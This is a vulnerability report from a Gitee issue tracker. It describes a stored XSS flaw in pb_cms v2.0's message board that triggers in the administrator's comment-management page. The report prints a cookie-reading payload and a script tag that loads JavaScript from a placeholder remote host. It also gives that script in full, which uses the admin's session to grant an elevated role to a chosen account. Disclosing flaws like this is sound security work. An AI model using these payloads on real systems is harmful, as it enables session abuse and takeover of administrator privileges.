131 Star 1.1K Fork 511

LinZhaoguan / pb-cms

 / 详情

A stored XSS vulnerability in pb_cms v2.0 message board

已完成
创建于  
2022-03-15 14:58

The message board function in pb_cms v2.0 allows attackers to insert malicious XSS code into the mailbox information in the message board and trigger it in the background of the administrator.

Account is not required.

Enter the message board page, insert the malicious XSS code into the mailbox input box, complete other information, and then submit.

payload: <script>alert(document.cookie)</script>

输入图片说明

When an administrator or other role with permission to manage the comment management page enters the comment management page, the malicious XSS code is successfully triggered:

输入图片说明
输入图片说明

Escalation of Privileges

At the same time, this vulnerability can be used to escalate any account privileges to any role.
Enter the message board page, insert the malicious XSS code into the mailbox input box, complete other information, and then submit.
payload:<script src="http://xxxxx/x.js"></script>
x.js:

$.post(
    "user/list", {
        pageNumber: 1,
        pageSize: 9999
    },
    function(data) {
        console.log(data);
        for (const index in data.rows) {
            console.log(data.rows[index]);
            console.log(data.rows[index].userId);
            console.log(data.rows[index].username);
            if (data.rows[index].username === 'test') {
                $.post(
                    "user/assign/role", {
                        roleIdStr: 1,
                        userId: data.rows[index].userId
                    });
            }
        }
    }
);

The role of the test account used for testing prior to visiting the Comment Management page:

输入图片说明

When an administrator or other role with permission to manage the comment management page enters the comment management page, the malicious XSS code is successfully triggered:

输入图片说明
输入图片说明
Safety advice:

  • Strictly filter the user's input
  • Strict control of page rendering content

评论 (0)

SomUrim 创建了任务
SomUrim 修改了描述
SomUrim 修改了描述
SomUrim 修改了描述
LinZhaoguan 通过 LinZhaoguan/pb-cms Commit 4c62c71任务状态从 待办的 修改为已完成
展开全部操作日志

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
4836459 somurim 1578975389
Java
1
https://gitee.com/LinZhaoguan/pb-cms.git
git@gitee.com:LinZhaoguan/pb-cms.git
LinZhaoguan
pb-cms
pb-cms

搜索帮助